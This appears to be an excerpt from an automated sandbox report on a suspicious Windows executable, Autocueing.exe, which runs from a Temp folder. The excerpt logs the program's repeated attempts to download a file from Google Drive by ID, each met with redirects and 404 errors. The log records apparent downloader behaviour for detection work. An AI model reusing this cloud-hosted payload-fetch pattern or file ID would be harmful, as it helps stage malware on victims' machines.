                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-SZEtofncq8YV9J3Fy8Kg5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 50011 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:32 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:33 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4YvSTyLvi0CHL0tZXnnkol2CqB8On034g77pEMzV8QZoiWHEe3vQ1KsBmFGXOBMP--
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:33 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-Qr5xjXmzfhZr6GIhcbLtjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:33 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fGQ9W0MCqyIUtx0UV80cKQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 50012 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:33 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:34 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-poLkU90cpkZE6xhI5QqIVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 50013 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:35 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:35 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSIL3L3et1jcTSjYxsyVm7jljsm6mguYH2OPW7zI44BbsZwkRdo05na2bmIgphK8NDA
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:35 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-4mIxTvIU7EfXXX7pBguplg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:35 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SLlPwkJTkijWGnG5abwajA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 50015 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:36 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:36 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:36 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-VKHPBfFE8g92vqGGH8PY9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 50016 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:37 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:37 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSqY9Ex58tWnsi2z_d5zEYnAMyqUZj6HWOrkR5rFGKq2IOoA8_R8u2nzeyJq8GQCDUwkyuRz5w
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:37 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-7YRXiIlHp7-usUVliTPDWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:37 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5oa58ZjKV6RgmZ9jO_vkBA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    32 | 192.168.2.6 | 50017 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:38 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:39 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:39 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-NGtX2bqOBJZ4aPgNEibcnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    33 | 192.168.2.6 | 50018 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:39 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:40 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTUaiXexMFMCoqCIRTPADVtnnGXbcwmvIAlF7t7uJj3I6uskdOJpSTaGwWg5q0Ov28F-f83TAU
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:40 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-3jU07yO4HtuUjBlGMVnmmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:40 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U3usXvdgly8329mlvKlpdg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                    34 | 192.168.2.6 | 50019 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                    2025-01-11 04:28:41 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:41 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
